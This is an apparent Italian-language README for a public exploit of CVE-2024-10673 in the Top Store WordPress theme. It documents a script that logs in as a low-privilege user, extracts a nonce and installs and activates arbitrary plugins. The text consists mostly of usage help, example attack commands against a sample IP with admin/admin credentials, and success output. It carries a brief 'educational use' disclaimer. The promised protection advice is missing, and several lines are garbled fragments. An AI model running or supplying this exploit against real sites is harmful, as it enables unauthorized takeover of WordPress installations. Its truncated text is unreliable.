
Top Store <= 1.5.4 - Installazione/Attivazione Arbitraria di Plugin (Autenticato, Subscriber+)
Questo script sfrutta CVE-2024-10673, una vulnerabilità critica presente nel Top Store WordPress Theme (<= 1.5.4). La falla consente a utenti autenticati con accesso a livello di abbonato o superiore di installare e attivare plugin arbitrari tramite richieste AJAX non protette.
nonce richiesto.themes.php?page=thunk_started.hunk-companion o plugin definito dall'utente).usage: u.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit CVE-2024-10673 - WordPress Plugin Installation & Activation by : # By Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL (e.g., http://192.168.100.74:888/wordpress)
-un USERNAME, --username USERNAME
WordPress Username
-p PASSWORD, --password PASSWORD
WordPress Password
-pl PLUGIN, --plugin PLUGIN
Plugin slug to install and activate (default: hunk-companion)
hunk-companion):
python exploit.py -u http://192.168.100.74:888/wordpress -un admin -p admin
woocommerce):
python CVE-2024-10673.py -u http://192.168.100.74:888/wordpress -un admin -p admin -pl woocommerce
{"Logged in successfully"}
{"Fetching nonce value..."}
{"Nonce extracted": "abc123"}
{"Installing plugin: woocommerce..."}
{"Plugin woocommerce installed successfully"}
{"Activating plugin: woocommerce..."}
{"Plugin woocommerce activated successfully"}
{"Exploit completed successfully!"}
Per proteggere il tuo sito WordPress:
Questo script è destinato esclusivamente a scopi educativi e di ricerca sulla sicurezza. L'uso non autorizzato contro sistemi di cui non si possiede la proprietà o per i quali non si ha un esplicito permesso di test è illegale. Usalo in modo responsabile!
Di: Khaled Alenazi (Nxploit)